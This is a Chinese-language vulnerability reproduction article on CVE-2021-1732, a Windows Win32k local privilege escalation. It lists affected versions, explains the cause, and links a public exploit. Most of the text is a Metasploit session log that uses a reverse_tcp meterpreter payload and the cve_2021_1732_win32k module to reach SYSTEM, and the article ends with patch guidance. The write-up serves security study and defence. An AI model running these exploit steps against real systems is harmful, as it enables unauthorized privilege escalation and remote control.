CVE-2021-1732:Windows Win32k提权
原创CVE-2021-1732:Windows Win32k提权
原创
影响范围
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows Server, version 1909 (Server Core installation)
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1803 for ARM64-based Systems
Windows 10 Version 1803 for x64-based Systems
漏洞类型
本地权限提升
利用条件
影响范围应用
漏洞概述
2021年2月10日,微软例行补丁包中修复了一个Windows系统本地提权漏洞,本地攻击者可以利用此漏洞提升到system权限,据称造成该漏洞的主要原因是Windows 图形驱动win32kfull!NtUserCreateWindowEx函数中的一处内核回调用户态分配内存与tagWND->flag属性设置不同步所致,使得可以通过伪造tagWND->offset值发生内存越界。
漏洞复现
环境搭建
前往"MSDN我告诉你"(https://msdn.itellyou.cn/)下载Windows 10 1909 x64位操作系统:
之后通过虚拟机安装Windows 10 1909系统镜像来搭建Windows 10漏洞复现环境,查看版本信息如下:
查看当前用户权限如下:
漏洞利用
下载漏洞EXP:
https://github.com/KaLendsi/CVE-2021-1732-Exploit
之后编译EXP:
在Windows 10上执行EXP后成功提权之system权限:
MSF框架
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-JKM0HAD\aliddle
meterpreter > sysinfo
Computer : DESKTOP-JKM0HAD
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2021_1732_win32k
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2021_1732_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_1732_win32k) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/local/cve_2021_1732_win32k) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 7672 launched.
[*] Reflectively injecting the DLL into 7672...
[*] Sending stage (200262 bytes) to 192.168.159.66
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.66:60838) at 2021-03-15 17:56:28 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 安全建议
官方已发布更新补丁包,在影响范围的系统可以打补丁进行修复:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732
参考链接
https://github.com/rapid7/metasploit-framework/pull/14907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1732
https://msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。